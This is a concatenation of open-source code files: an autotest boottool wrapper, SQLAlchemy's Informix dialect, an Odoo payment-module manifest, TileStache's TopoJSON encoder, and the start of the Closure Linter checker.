'--remove-args="%s"') % (kernel, args)
def add_kernel(self, path, title='autoserv', root=None, args=None,
initrd=None, xen_hypervisor=None, default=True):
"""
If an entry with the same title is already present, it will be
replaced.
"""
if title in self.get_titles():
self._run_boottool('--remove-kernel "%s"' % (
utils.sh_escape(title),))
parameters = '--add-kernel "%s" --title "%s"' % (
utils.sh_escape(path), utils.sh_escape(title),)
if root:
parameters += ' --root "%s"' % (utils.sh_escape(root),)
if args:
parameters += ' --args "%s"' % (utils.sh_escape(args),)
# add an initrd now or forever hold your peace
if initrd:
parameters += ' --initrd "%s"' % (
utils.sh_escape(initrd),)
if default:
parameters += ' --make-default'
# add parameter if this is a Xen entry
if self.xen_mode:
parameters += ' --xen'
if xen_hypervisor:
parameters += ' --xenhyper "%s"' % (
utils.sh_escape(xen_hypervisor),)
self._run_boottool(parameters)
def remove_kernel(self, kernel):
self._run_boottool('--remove-kernel=%s' % kernel)
def boot_once(self, title):
if self._host().job:
self._host().job.last_boot_tag = title
if not title:
title = self.get_default_title()
self._run_boottool('--boot-once --title=%s' % title)
def install_boottool(self):
if self._host() is None:
raise error.AutoservError(
"Host does not exist anymore")
tmpdir = self._host().get_tmp_dir()
self._host().send_file(os.path.abspath(os.path.join(
utils.get_server_dir(), BOOTTOOL_SRC)), tmpdir)
self._boottool_path= os.path.join(tmpdir,
os.path.basename(BOOTTOOL_SRC))
def _get_boottool_path(self):
if not self._boottool_path:
self.install_boottool()
return self._boottool_path
def _set_boottool_path(self, path):
self._boottool_path = path
boottool_path = property(_get_boottool_path, _set_boottool_path)
def _run_boottool(self, cmd):
return self._host().run(self.boottool_path + ' ' + cmd)
| gpl-2.0 |
pitch-sands/i-MPI | flask/Lib/site-packages/sqlalchemy/dialects/informix/base.py | 17 | 26186 | # informix/base.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
# coding: gbk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Support for the Informix database.
.. note::
The Informix dialect functions on current SQLAlchemy versions
but is not regularly tested, and may have many issues and
caveats not currently handled.
"""
import datetime
from sqlalchemy import sql, schema, exc, pool, util
from sqlalchemy.sql import compiler, text
from sqlalchemy.engine import default, reflection
from sqlalchemy import types as sqltypes
RESERVED_WORDS = set(
["abs", "absolute", "access", "access_method", "acos", "active", "add",
"address", "add_months", "admin", "after", "aggregate", "alignment",
"all", "allocate", "all_rows", "alter", "and", "ansi", "any", "append",
"array", "as", "asc", "ascii", "asin", "at", "atan", "atan2", "attach",
"attributes", "audit", "authentication", "authid", "authorization",
"authorized", "auto", "autofree", "auto_reprepare", "auto_stat_mode",
"avg", "avoid_execute", "avoid_fact", "avoid_full", "avoid_hash",
"avoid_index", "avoid_index_sj", "avoid_multi_index", "avoid_nl",
"avoid_star_join", "avoid_subqf", "based", "before", "begin",
"between", "bigint", "bigserial", "binary", "bitand", "bitandnot",
"bitnot", "bitor", "bitxor", "blob", "blobdir", "boolean", "both",
"bound_impl_pdq", "buffered", "builtin", "by", "byte", "cache", "call",
"cannothash", "cardinality", "cascade", "case", "cast", "ceil", "char",
"character", "character_length", "char_length", "check", "class",
"class_origin", "client", "clob", "clobdir", "close", "cluster",
"clustersize", "cobol", "codeset", "collation", "collection",
"column", "columns", "commit", "committed", "commutator", "component",
"components", "concat", "concurrent", "connect", "connection",
"connection_name", "connect_by_iscycle", "connect_by_isleaf",
"connect_by_rootconst", "constraint", "constraints", "constructor",
"context", "continue", "copy", "cos", "costfunc", "count", "crcols",
"create", "cross", "current", "current_role", "currval", "cursor",
"cycle", "database", "datafiles", "dataskip", "date", "datetime",
"day", "dba", "dbdate", "dbinfo", "dbpassword", "dbsecadm",
"dbservername", "deallocate", "debug", "debugmode", "debug_env", "dec",
"decimal", "declare", "decode", "decrypt_binary", "decrypt_char",
"dec_t", "default", "default_role", "deferred", "deferred_prepare",
"define", "delay", "delete", "deleting", "delimited", "delimiter",
"deluxe", "desc", "describe", "descriptor", "detach", "diagnostics",
"directives", "dirty", "disable", "disabled", "disconnect", "disk",
"distinct", "distributebinary", "distributesreferences",
"distributions", "document", "domain", "donotdistribute", "dormant",
"double", "drop", "dtime_t", "each", "elif", "else", "enabled",
"encryption", "encrypt_aes", "encrypt_tdes", "end", "enum",
"environment", "error", "escape", "exception", "exclusive", "exec",
"execute", "executeanywhere", "exemption", "exists", "exit", "exp",
"explain", "explicit", "express", "expression", "extdirectives",
"extend", "extent", "external", "fact", "false", "far", "fetch",
"file", "filetoblob", "filetoclob", "fillfactor", "filtering", "first",
"first_rows", "fixchar", "fixed", "float", "floor", "flush", "for",
"force", "forced", "force_ddl_exec", "foreach", "foreign", "format",
"format_units", "fortran", "found", "fraction", "fragment",
"fragments", "free", "from", "full", "function", "general", "get",
"gethint", "global", "go", "goto", "grant", "greaterthan",
"greaterthanorequal", "group", "handlesnulls", "hash", "having", "hdr",
"hex", "high", "hint", "hold", "home", "hour", "idslbacreadarray",
"idslbacreadset", "idslbacreadtree", "idslbacrules",
"idslbacwritearray", "idslbacwriteset", "idslbacwritetree",
"idssecuritylabel", "if", "ifx_auto_reprepare", "ifx_batchedread_table",
"ifx_int8_t", "ifx_lo_create_spec_t", "ifx_lo_stat_t", "immediate",
"implicit", "implicit_pdq", "in", "inactive", "increment", "index",
"indexes", "index_all", "index_sj", "indicator", "informix", "init",
"initcap", "inline", "inner", "inout", "insert", "inserting", "instead",
"int", "int8", "integ", "integer", "internal", "internallength",
"interval", "into", "intrvl_t", "is", "iscanonical", "isolation",
"item", "iterator", "java", "join", "keep", "key", "label", "labeleq",
"labelge", "labelglb", "labelgt", "labelle", "labellt", "labellub",
"labeltostring", "language", "last", "last_day", "leading", "left",
"length", "lessthan", "lessthanorequal", "let", "level", "like",
"limit", "list", "listing", "load", "local", "locator", "lock", "locks",
"locopy", "loc_t", "log", "log10", "logn", "long", "loop", "lotofile",
"low", "lower", "lpad", "ltrim", "lvarchar", "matched", "matches",
"max", "maxerrors", "maxlen", "maxvalue", "mdy", "median", "medium",
"memory", "memory_resident", "merge", "message_length", "message_text",
"middle", "min", "minute", "minvalue", "mod", "mode", "moderate",
"modify", "module", "money", "month", "months_between", "mounting",
"multiset", "multi_index", "name", "nchar", "negator", "new", "next",
"nextval", "next_day", "no", "nocache", "nocycle", "nomaxvalue",
"nomigrate", "nominvalue", "none", "non_dim", "non_resident", "noorder",
"normal", "not", "notemplatearg", "notequal", "null", "nullif",
"numeric", "numrows", "numtodsinterval", "numtoyminterval", "nvarchar",
"nvl", "octet_length", "of", "off", "old", "on", "online", "only",
"opaque", "opclass", "open", "optcompind", "optical", "optimization",
"option", "or", "order", "ordered", "out", "outer", "output",
"override", "page", "parallelizable", "parameter", "partition",
"pascal", "passedbyvalue", "password", "pdqpriority", "percaltl_cos",
"pipe", "pli", "pload", "policy", "pow", "power", "precision",
"prepare", "previous", "primary", "prior", "private", "privileges",
"procedure", "properties", "public", "put", "raise", "range", "raw",
"read", "real", "recordend", "references", "referencing", "register",
"rejectfile", "relative", "release", "remainder", "rename",
"reoptimization", "repeatable", "replace", "replication", "reserve",
"resolution", "resource", "restart", "restrict", "resume", "retain",
"retainupdatelocks", "return", "returned_sqlstate", "returning",
"returns", "reuse", "revoke", "right", "robin", "role", "rollback",
"rollforward", "root", "round", "routine", "row", "rowid", "rowids",
"rows", "row_count", "rpad", "rtrim", "rule", "sameas", "samples",
"sampling", "save", "savepoint", "schema", "scroll", "seclabel_by_comp",
"seclabel_by_name", "seclabel_to_char", "second", "secondary",
"section", "secured", "security", "selconst", "select", "selecting",
"selfunc", "selfuncargs", "sequence", "serial", "serial8",
"serializable", "serveruuid", "server_name", "session", "set",
"setsessionauth", "share", "short", "siblings", "signed", "sin",
"sitename", "size", "skall", "skinhibit", "skip", "skshow",
"smallfloat", "smallint", "some", "specific", "sql", "sqlcode",
"sqlcontext", "sqlerror", "sqlstate", "sqlwarning", "sqrt",
"stability", "stack", "standard", "start", "star_join", "statchange",
"statement", "static", "statistics", "statlevel", "status", "stdev",
"step", "stop", "storage", "store", "strategies", "string",
"stringtolabel", "struct", "style", "subclass_origin", "substr",
"substring", "sum", "support", "sync", "synonym", "sysdate",
"sysdbclose", "sysdbopen", "system", "sys_connect_by_path", "table",
"tables", "tan", "task", "temp", "template", "test", "text", "then",
"time", "timeout", "to", "today", "to_char", "to_date",
"to_dsinterval", "to_number", "to_yminterval", "trace", "trailing",
"transaction", "transition", "tree", "trigger", "triggers", "trim",
"true", "trunc", "truncate", "trusted", "type", "typedef", "typeid",
"typename", "typeof", "uid", "uncommitted", "under", "union",
"unique", "units", "unknown", "unload", "unlock", "unsigned",
"update", "updating", "upon", "upper", "usage", "use",
"uselastcommitted", "user", "use_hash", "use_nl", "use_subqf",
"using", "value", "values", "var", "varchar", "variable", "variance",
"variant", "varying", "vercols", "view", "violations", "void",
"volatile", "wait", "warning", "weekday", "when", "whenever", "where",
"while", "with", "without", "work", "write", "writedown", "writeup",
"xadatasource", "xid", "xload", "xunload", "year"
])
class InfoDateTime(sqltypes.DateTime):
def bind_processor(self, dialect):
def process(value):
if value is not None:
if value.microsecond:
value = value.replace(microsecond=0)
return value
return process
class InfoTime(sqltypes.Time):
def bind_processor(self, dialect):
def process(value):
if value is not None:
if value.microsecond:
value = value.replace(microsecond=0)
return value
return process
def result_processor(self, dialect, coltype):
def process(value):
if isinstance(value, datetime.datetime):
return value.time()
else:
return value
return process
colspecs = {
sqltypes.DateTime : InfoDateTime,
sqltypes.TIMESTAMP: InfoDateTime,
sqltypes.Time: InfoTime,
}
ischema_names = {
0 : sqltypes.CHAR, # CHAR
1 : sqltypes.SMALLINT, # SMALLINT
2 : sqltypes.INTEGER, # INT
3 : sqltypes.FLOAT, # Float
3 : sqltypes.Float, # SmallFloat
5 : sqltypes.DECIMAL, # DECIMAL
6 : sqltypes.Integer, # Serial
7 : sqltypes.DATE, # DATE
8 : sqltypes.Numeric, # MONEY
10 : sqltypes.DATETIME, # DATETIME
11 : sqltypes.LargeBinary, # BYTE
12 : sqltypes.TEXT, # TEXT
13 : sqltypes.VARCHAR, # VARCHAR
15 : sqltypes.NCHAR, # NCHAR
16 : sqltypes.NVARCHAR, # NVARCHAR
17 : sqltypes.Integer, # INT8
18 : sqltypes.Integer, # Serial8
43 : sqltypes.String, # LVARCHAR
-1 : sqltypes.BLOB, # BLOB
-1 : sqltypes.CLOB, # CLOB
}
class InfoTypeCompiler(compiler.GenericTypeCompiler):
def visit_DATETIME(self, type_):
return "DATETIME YEAR TO SECOND"
def visit_TIME(self, type_):
return "DATETIME HOUR TO SECOND"
def visit_TIMESTAMP(self, type_):
return "DATETIME YEAR TO SECOND"
def visit_large_binary(self, type_):
return "BYTE"
def visit_boolean(self, type_):
return "SMALLINT"
class InfoSQLCompiler(compiler.SQLCompiler):
def default_from(self):
return " from systables where tabname = 'systables' "
def get_select_precolumns(self, select):
s = ""
if select._offset:
s += "SKIP %s " % select._offset
if select._limit:
s += "FIRST %s " % select._limit
s += select._distinct and "DISTINCT " or ""
return s
def visit_select(self, select, asfrom=False, parens=True, **kw):
text = compiler.SQLCompiler.visit_select(self, select, asfrom, parens, **kw)
if asfrom and parens and self.dialect.server_version_info < (11,):
#assuming that 11 version doesn't need this, not tested
return "table(multiset" + text + ")"
else:
return text
def limit_clause(self, select):
return ""
def visit_function(self, func, **kw):
if func.name.lower() == 'current_date':
return "today"
elif func.name.lower() == 'current_time':
return "CURRENT HOUR TO SECOND"
elif func.name.lower() in ('current_timestamp', 'now'):
return "CURRENT YEAR TO SECOND"
else:
return compiler.SQLCompiler.visit_function(self, func, **kw)
def visit_mod(self, binary, **kw):
return "MOD(%s, %s)" % (self.process(binary.left), self.process(binary.right))
class InfoDDLCompiler(compiler.DDLCompiler):
def visit_add_constraint(self, create):
preparer = self.preparer
return "ALTER TABLE %s ADD CONSTRAINT %s" % (
self.preparer.format_table(create.element.table),
self.process(create.element)
)
def get_column_specification(self, column, **kw):
colspec = self.preparer.format_column(column)
first = None
if column.primary_key and column.autoincrement:
try:
first = [c for c in column.table.primary_key.columns
if (c.autoincrement and
isinstance(c.type, sqltypes.Integer) and
not c.foreign_keys)].pop(0)
except IndexError:
pass
if column is first:
colspec += " SERIAL"
else:
colspec += " " + self.dialect.type_compiler.process(column.type)
default = self.get_column_default_string(column)
if default is not None:
colspec += " DEFAULT " + default
if not column.nullable:
colspec += " NOT NULL"
return colspec
def get_column_default_string(self, column):
if (isinstance(column.server_default, schema.DefaultClause) and
isinstance(column.server_default.arg, basestring)):
if isinstance(column.type, (sqltypes.Integer, sqltypes.Numeric)):
return self.sql_compiler.process(text(column.server_default.arg))
return super(InfoDDLCompiler, self).get_column_default_string(column)
### Informix wants the constraint name at the end, hence this ist c&p from sql/compiler.py
def visit_primary_key_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = "PRIMARY KEY "
text += "(%s)" % ', '.join(self.preparer.quote(c.name, c.quote)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
if constraint.name is not None:
text += " CONSTRAINT %s" % self.preparer.format_constraint(constraint)
return text
def visit_foreign_key_constraint(self, constraint):
preparer = self.dialect.identifier_preparer
remote_table = list(constraint._elements.values())[0].column.table
text = "FOREIGN KEY (%s) REFERENCES %s (%s)" % (
', '.join(preparer.quote(f.parent.name, f.parent.quote)
for f in constraint._elements.values()),
preparer.format_table(remote_table),
', '.join(preparer.quote(f.column.name, f.column.quote)
for f in constraint._elements.values())
)
text += self.define_constraint_cascades(constraint)
text += self.define_constraint_deferrability(constraint)
if constraint.name is not None:
text += " CONSTRAINT %s " % \
preparer.format_constraint(constraint)
return text
def visit_unique_constraint(self, constraint):
text = "UNIQUE (%s)" % (', '.join(self.preparer.quote(c.name, c.quote) for c in constraint))
text += self.define_constraint_deferrability(constraint)
if constraint.name is not None:
text += "CONSTRAINT %s " % self.preparer.format_constraint(constraint)
return text
class InformixIdentifierPreparer(compiler.IdentifierPreparer):
reserved_words = RESERVED_WORDS
class InformixDialect(default.DefaultDialect):
name = 'informix'
max_identifier_length = 128 # adjusts at runtime based on server version
type_compiler = InfoTypeCompiler
statement_compiler = InfoSQLCompiler
ddl_compiler = InfoDDLCompiler
colspecs = colspecs
ischema_names = ischema_names
preparer = InformixIdentifierPreparer
default_paramstyle = 'qmark'
def __init__(self, has_transactions=True, *args, **kwargs):
self.has_transactions = has_transactions
default.DefaultDialect.__init__(self, *args, **kwargs)
def initialize(self, connection):
super(InformixDialect, self).initialize(connection)
# http://www.querix.com/support/knowledge-base/error_number_message/error_200
if self.server_version_info < (9, 2):
self.max_identifier_length = 18
else:
self.max_identifier_length = 128
def do_begin(self, connection):
cu = connection.cursor()
cu.execute('SET LOCK MODE TO WAIT')
if self.has_transactions:
cu.execute('SET ISOLATION TO REPEATABLE READ')
def do_commit(self, connection):
if self.has_transactions:
connection.commit()
def do_rollback(self, connection):
if self.has_transactions:
connection.rollback()
def _get_table_names(self, connection, schema, type, **kw):
schema = schema or self.default_schema_name
s = "select tabname, owner from systables where owner=? and tabtype=?"
return [row[0] for row in connection.execute(s, schema, type)]
@reflection.cache
def get_table_names(self, connection, schema=None, **kw):
return self._get_table_names(connection, schema, 'T', **kw)
@reflection.cache
def get_view_names(self, connection, schema=None, **kw):
return self._get_table_names(connection, schema, 'V', **kw)
@reflection.cache
def get_schema_names(self, connection, **kw):
s = "select owner from systables"
return [row[0] for row in connection.execute(s)]
def has_table(self, connection, table_name, schema=None):
schema = schema or self.default_schema_name
cursor = connection.execute(
"""select tabname from systables where tabname=? and owner=?""",
table_name, schema)
return cursor.first() is not None
@reflection.cache
def get_columns(self, connection, table_name, schema=None, **kw):
schema = schema or self.default_schema_name
c = connection.execute(
"""select colname, coltype, collength, t3.default, t1.colno from
syscolumns as t1 , systables as t2 , OUTER sysdefaults as t3
where t1.tabid = t2.tabid and t2.tabname=? and t2.owner=?
and t3.tabid = t2.tabid and t3.colno = t1.colno
order by t1.colno""", table_name, schema)
primary_cols = self.get_primary_keys(connection, table_name, schema, **kw)
columns = []
rows = c.fetchall()
for name, colattr, collength, default, colno in rows:
name = name.lower()
autoincrement = False
primary_key = False
if name in primary_cols:
primary_key = True
# in 7.31, coltype = 0x000
# ^^-- column type
# ^-- 1 not null, 0 null
not_nullable, coltype = divmod(colattr, 256)
if coltype not in (0, 13) and default:
default = default.split()[-1]
if coltype == 6: # Serial, mark as autoincrement
autoincrement = True
if coltype == 0 or coltype == 13: # char, varchar
coltype = ischema_names[coltype](collength)
if default:
default = "'%s'" % default
elif coltype == 5: # decimal
precision, scale = (collength & 0xFF00) >> 8, collength & 0xFF
if scale == 255:
scale = 0
coltype = sqltypes.Numeric(precision, scale)
else:
try:
coltype = ischema_names[coltype]
except KeyError:
util.warn("Did not recognize type '%s' of column '%s'" %
(coltype, name))
coltype = sqltypes.NULLTYPE
column_info = dict(name=name, type=coltype, nullable=not not_nullable,
default=default, autoincrement=autoincrement,
primary_key=primary_key)
columns.append(column_info)
return columns
@reflection.cache
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
schema_sel = schema or self.default_schema_name
c = connection.execute(
"""select t1.constrname as cons_name,
t4.colname as local_column, t7.tabname as remote_table,
t6.colname as remote_column, t7.owner as remote_owner
from sysconstraints as t1 , systables as t2 ,
sysindexes as t3 , syscolumns as t4 ,
sysreferences as t5 , syscolumns as t6 , systables as t7 ,
sysconstraints as t8 , sysindexes as t9
where t1.tabid = t2.tabid and t2.tabname=? and t2.owner=? and t1.constrtype = 'R'
and t3.tabid = t2.tabid and t3.idxname = t1.idxname
and t4.tabid = t2.tabid and t4.colno in (t3.part1, t3.part2, t3.part3,
t3.part4, t3.part5, t3.part6, t3.part7, t3.part8, t3.part9, t3.part10,
t3.part11, t3.part11, t3.part12, t3.part13, t3.part4, t3.part15, t3.part16)
and t5.constrid = t1.constrid and t8.constrid = t5.primary
and t6.tabid = t5.ptabid and t6.colno in (t9.part1, t9.part2, t9.part3,
t9.part4, t9.part5, t9.part6, t9.part7, t9.part8, t9.part9, t9.part10,
t9.part11, t9.part11, t9.part12, t9.part13, t9.part4, t9.part15, t9.part16) and t9.idxname =
t8.idxname
and t7.tabid = t5.ptabid""", table_name, schema_sel)
def fkey_rec():
return {
'name' : None,
'constrained_columns' : [],
'referred_schema' : None,
'referred_table' : None,
'referred_columns' : []
}
fkeys = util.defaultdict(fkey_rec)
rows = c.fetchall()
for cons_name, local_column, \
remote_table, remote_column, remote_owner in rows:
rec = fkeys[cons_name]
rec['name'] = cons_name
local_cols, remote_cols = \
rec['constrained_columns'], rec['referred_columns']
if not rec['referred_table']:
rec['referred_table'] = remote_table
if schema is not None:
rec['referred_schema'] = remote_owner
if local_column not in local_cols:
local_cols.append(local_column)
if remote_column not in remote_cols:
remote_cols.append(remote_column)
return fkeys.values()
@reflection.cache
def get_primary_keys(self, connection, table_name, schema=None, **kw):
schema = schema or self.default_schema_name
# Select the column positions from sysindexes for sysconstraints
data = connection.execute(
"""select t2.*
from systables as t1, sysindexes as t2, sysconstraints as t3
where t1.tabid=t2.tabid and t1.tabname=? and t1.owner=?
and t2.idxname=t3.idxname and t3.constrtype='P'""",
table_name, schema
).fetchall()
colpositions = set()
for row in data:
colpos = set([getattr(row, 'part%d' % x) for x in range(1,16)])
colpositions |= colpos
if not len(colpositions):
return []
# Select the column names using the columnpositions
# TODO: Maybe cache a bit of those col infos (eg select all colnames for one table)
place_holder = ','.join('?'*len(colpositions))
c = connection.execute(
"""select t1.colname
from syscolumns as t1, systables as t2
where t2.tabname=? and t1.tabid = t2.tabid and
t1.colno in (%s)""" % place_holder,
table_name, *colpositions
).fetchall()
return reduce(lambda x,y: list(x)+list(y), c, [])
@reflection.cache
def get_indexes(self, connection, table_name, schema, **kw):
# TODO: schema...
c = connection.execute(
"""select t1.*
from sysindexes as t1 , systables as t2
where t1.tabid = t2.tabid and t2.tabname=?""",
table_name)
indexes = []
for row in c.fetchall():
colnames = [getattr(row, 'part%d' % x) for x in range(1,16)]
colnames = [x for x in colnames if x]
place_holder = ','.join('?'*len(colnames))
c = connection.execute(
"""select t1.colname
from syscolumns as t1, systables as t2
where t2.tabname=? and t1.tabid = t2.tabid and
t1.colno in (%s)""" % place_holder,
table_name, *colnames
).fetchall()
c = reduce(lambda x,y: list(x)+list(y), c, [])
indexes.append({
'name': row.idxname,
'unique': row.idxtype.lower() == 'u',
'column_names': c
})
return indexes
@reflection.cache
def get_view_definition(self, connection, view_name, schema=None, **kw):
schema = schema or self.default_schema_name
c = connection.execute(
"""select t1.viewtext
from sysviews as t1 , systables as t2
where t1.tabid=t2.tabid and t2.tabname=?
and t2.owner=? order by seqno""",
view_name, schema).fetchall()
return ''.join([row[0] for row in c])
def _get_default_schema_name(self, connection):
return connection.execute('select CURRENT_ROLE from systables').scalar()
| bsd-3-clause |
gorjuce/odoo | addons/account_payment/__openerp__.py | 261 | 2925 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Suppliers Payment Management',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Accounting & Finance',
'description': """
Module to manage the payment of your supplier invoices.
=======================================================
This module allows you to create and manage your payment orders, with purposes to
---------------------------------------------------------------------------------
* serve as base for an easy plug-in of various automated payment mechanisms.
* provide a more efficient way to manage invoice payment.
Warning:
~~~~~~~~
The confirmation of a payment order does _not_ create accounting entries, it just
records the fact that you gave your payment order to your bank. The booking of
your order must be encoded as usual through a bank statement. Indeed, it's only
when you get the confirmation from your bank that your order has been accepted
that you can book it in your accounting. To help you with that operation, you
have a new option to import payment orders as bank statement lines.
""",
'depends': ['account','account_voucher'],
'data': [
'security/account_payment_security.xml',
'security/ir.model.access.csv',
'wizard/account_payment_pay_view.xml',
'wizard/account_payment_populate_statement_view.xml',
'wizard/account_payment_create_order_view.xml',
'account_payment_view.xml',
'account_payment_workflow.xml',
'account_payment_sequence.xml',
'account_payment_report.xml',
'views/report_paymentorder.xml',
],
'demo': ['account_payment_demo.xml'],
'test': [
'test/account_payment_demo.yml',
'test/cancel_payment_order.yml',
'test/payment_order_process.yml',
'test/account_payment_report.yml',
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mdiener21/python-geospatial-analysis-cookbook | ch10/TileStache-master/TileStache/Goodies/VecTiles/topojson.py | 6 | 8186 | from shapely.wkb import loads
import json
from ... import getTile
from ...Core import KnownUnknown
def get_tiles(names, config, coord):
''' Retrieve a list of named TopoJSON layer tiles from a TileStache config.
Check integrity and compatibility of each, looking at known layers,
correct JSON mime-types, "Topology" in the type attributes, and
matching affine transformations.
'''
unknown_layers = set(names) - set(config.layers.keys())
if unknown_layers:
raise KnownUnknown("%s.get_tiles didn't recognize %s when trying to load %s." % (__name__, ', '.join(unknown_layers), ', '.join(names)))
layers = [config.layers[name] for name in names]
mimes, bodies = zip(*[getTile(layer, coord, 'topojson') for layer in layers])
bad_mimes = [(name, mime) for (mime, name) in zip(mimes, names) if not mime.endswith('/json')]
if bad_mimes:
raise KnownUnknown('%s.get_tiles encountered a non-JSON mime-type in %s sub-layer: "%s"' % ((__name__, ) + bad_mimes[0]))
topojsons = map(json.loads, bodies)
bad_types = [(name, topo['type']) for (topo, name) in zip(topojsons, names) if topo['type'] != 'Topology']
if bad_types:
raise KnownUnknown('%s.get_tiles encountered a non-Topology type in %s sub-layer: "%s"' % ((__name__, ) + bad_types[0]))
transforms = [topo['transform'] for topo in topojsons]
unique_xforms = set([tuple(xform['scale'] + xform['translate']) for xform in transforms])
if len(unique_xforms) > 1:
raise KnownUnknown('%s.get_tiles encountered incompatible transforms: %s' % (__name__, list(unique_xforms)))
return topojsons
def update_arc_indexes(geometry, merged_arcs, old_arcs):
''' Updated geometry arc indexes, and add arcs to merged_arcs along the way.
Arguments are modified in-place, and nothing is returned.
'''
if geometry['type'] in ('Point', 'MultiPoint'):
return
elif geometry['type'] == 'LineString':
for (arc_index, old_arc) in enumerate(geometry['arcs']):
geometry['arcs'][arc_index] = len(merged_arcs)
merged_arcs.append(old_arcs[old_arc])
elif geometry['type'] == 'Polygon':
for ring in geometry['arcs']:
for (arc_index, old_arc) in enumerate(ring):
ring[arc_index] = len(merged_arcs)
merged_arcs.append(old_arcs[old_arc])
elif geometry['type'] == 'MultiLineString':
for part in geometry['arcs']:
for (arc_index, old_arc) in enumerate(part):
part[arc_index] = len(merged_arcs)
merged_arcs.append(old_arcs[old_arc])
elif geometry['type'] == 'MultiPolygon':
for part in geometry['arcs']:
for ring in part:
for (arc_index, old_arc) in enumerate(ring):
ring[arc_index] = len(merged_arcs)
merged_arcs.append(old_arcs[old_arc])
else:
raise NotImplementedError("Can't do %s geometries" % geometry['type'])
def get_transform(bounds, size=1024):
''' Return a TopoJSON transform dictionary and a point-transforming function.
Size is the tile size in pixels and sets the implicit output resolution.
'''
tx, ty = bounds[0], bounds[1]
sx, sy = (bounds[2] - bounds[0]) / size, (bounds[3] - bounds[1]) / size
def forward(lon, lat):
''' Transform a longitude and latitude to TopoJSON integer space.
'''
return int(round((lon - tx) / sx)), int(round((lat - ty) / sy))
return dict(translate=(tx, ty), scale=(sx, sy)), forward
def diff_encode(line, transform):
''' Differentially encode a shapely linestring or ring.
'''
coords = [transform(x, y) for (x, y) in line.coords]
pairs = zip(coords[:], coords[1:])
diffs = [(x2 - x1, y2 - y1) for ((x1, y1), (x2, y2)) in pairs]
return coords[:1] + [(x, y) for (x, y) in diffs if (x, y) != (0, 0)]
def decode(file):
''' Stub function to decode a TopoJSON file into a list of features.
Not currently implemented, modeled on geojson.decode().
'''
raise NotImplementedError('topojson.decode() not yet written')
def encode(file, features, bounds, is_clipped):
''' Encode a list of (WKB, property dict) features into a TopoJSON stream.
Also accept three-element tuples as features: (WKB, property dict, id).
Geometries in the features list are assumed to be unprojected lon, lats.
Bounds are given in geographic coordinates as (xmin, ymin, xmax, ymax).
'''
transform, forward = get_transform(bounds)
geometries, arcs = list(), list()
for feature in features:
shape = loads(feature[0])
geometry = dict(properties=feature[1])
geometries.append(geometry)
if is_clipped:
geometry.update(dict(clipped=True))
if len(feature) >= 2:
# ID is an optional third element in the feature tuple
geometry.update(dict(id=feature[2]))
if shape.type == 'GeometryCollection':
geometries.pop()
continue
elif shape.type == 'Point':
geometry.update(dict(type='Point', coordinates=forward(shape.x, shape.y)))
elif shape.type == 'LineString':
geometry.update(dict(type='LineString', arcs=[len(arcs)]))
arcs.append(diff_encode(shape, forward))
elif shape.type == 'Polygon':
geometry.update(dict(type='Polygon', arcs=[]))
rings = [shape.exterior] + list(shape.interiors)
for ring in rings:
geometry['arcs'].append([len(arcs)])
arcs.append(diff_encode(ring, forward))
elif shape.type == 'MultiPoint':
geometry.update(dict(type='MultiPoint', coordinates=[]))
for point in shape.geoms:
geometry['coordinates'].append(forward(point.x, point.y))
elif shape.type == 'MultiLineString':
geometry.update(dict(type='MultiLineString', arcs=[]))
for line in shape.geoms:
geometry['arcs'].append([len(arcs)])
arcs.append(diff_encode(line, forward))
elif shape.type == 'MultiPolygon':
geometry.update(dict(type='MultiPolygon', arcs=[]))
for polygon in shape.geoms:
rings = [polygon.exterior] + list(polygon.interiors)
polygon_arcs = []
for ring in rings:
polygon_arcs.append([len(arcs)])
arcs.append(diff_encode(ring, forward))
geometry['arcs'].append(polygon_arcs)
else:
raise NotImplementedError("Can't do %s geometries" % shape.type)
result = {
'type': 'Topology',
'transform': transform,
'objects': {
'vectile': {
'type': 'GeometryCollection',
'geometries': geometries
}
},
'arcs': arcs
}
json.dump(result, file, separators=(',', ':'))
def merge(file, names, config, coord):
''' Retrieve a list of TopoJSON tile responses and merge them into one.
get_tiles() retrieves data and performs basic integrity checks.
'''
inputs = get_tiles(names, config, coord)
output = {
'type': 'Topology',
'transform': inputs[0]['transform'],
'objects': dict(),
'arcs': list()
}
for (name, input) in zip(names, inputs):
for (index, object) in enumerate(input['objects'].values()):
if len(input['objects']) > 1:
output['objects']['%(name)s-%(index)d' % locals()] = object
else:
output['objects'][name] = object
for geometry in object['geometries']:
update_arc_indexes(geometry, output['arcs'], input['arcs'])
json.dump(output, file, separators=(',', ':'))
| mit |
byterom/android_external_chromium_org | third_party/closure_linter/closure_linter/checker.py | 109 | 3892 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core methods for checking JS files for common style guide violations."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)')
import gflags as flags
from closure_linter import aliaspass
from closure_linter import checkerbase
from closure_linter import closurizednamespacesinfo
from closure_linter import javascriptlintrules
flags.DEFINE_list('closurized_namespaces', '',
'Namespace prefixes, used for testing of'
'goog.provide/require')
